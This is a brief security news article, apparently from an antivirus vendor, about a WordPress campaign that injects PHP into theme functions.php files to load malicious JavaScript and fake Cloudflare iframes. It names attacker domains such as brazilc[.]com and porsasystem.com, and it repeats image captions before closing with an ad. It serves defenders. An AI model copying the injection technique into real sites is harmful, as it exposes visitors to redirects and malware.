WordPress security breach illustration: hacker injecting PHP code into functions.php file icon, arrows showing JS fetch from brazilc[.]com to site head, pop-up/redirect symbols and hidden iframe mimicking Cloudflare, protective lock on theme folder with "

Hackers are silently weaponizing WordPress sites through malicious PHP injections into theme files, particularly functions.php, to enable malvertising and compromise visitors without altering visible content. This stealthy campaign, uncovered by Sucuri after site owners spotted unexplained script loads, executes on every page request via the wp_head hook, fetching obfuscated JavaScript from attacker-controlled domains like brazilc[.]com/ads.php and embedding it in the HTML <head> for early execution.

WordPress security breach illustration: hacker injecting PHP code into functions.php file icon, arrows showing JS fetch from brazilc[.]com to site head, pop-up/redirect symbols and hidden iframe mimicking Cloudflare, protective lock on theme folder with "WordPress security breach illustration: hacker injecting PHP code into functions.php file icon, arrows showing JS fetch from brazilc[.]com to site head, pop-up/redirect symbols and hidden iframe mimicking Cloudflare, protective lock on theme folder with "

The intrusions exploit weak file permissions, outdated themes, and vulnerabilities in plugins or credentials, allowing hackers to append a benign-looking function that POSTs to a C2 server for dynamic payloads. These scripts load traffic-directing code from porsasystem.com/6m9x.js and inject hidden 1x1 iframes mimicking Cloudflare challenges, enabling forced redirects, pop-ups, and evasion of security tools by disguising as legitimate CDN activity.

WordPress security breach illustration: hacker injecting PHP code into functions.php file icon, arrows showing JS fetch from brazilc[.]com to site head, pop-up/redirect symbols and hidden iframe mimicking Cloudflare, protective lock on theme folder with "WordPress security breach illustration: hacker injecting PHP code into functions.php file icon, arrows showing JS fetch from brazilc[.]com to site head, pop-up/redirect symbols and hidden iframe mimicking Cloudflare, protective lock on theme folder with "

Security vendors have blocklisted involved domains, but the campaign's seamlessness highlights the need for strict file permissions, regular theme/plugin updates, and monitoring for anomalous JavaScript calls to prevent silent takeovers and protect user traffic.
 

NPAV offers a robust solution to combat cyber fraud. Protect yourself with our top-tier security product, Z Plus Security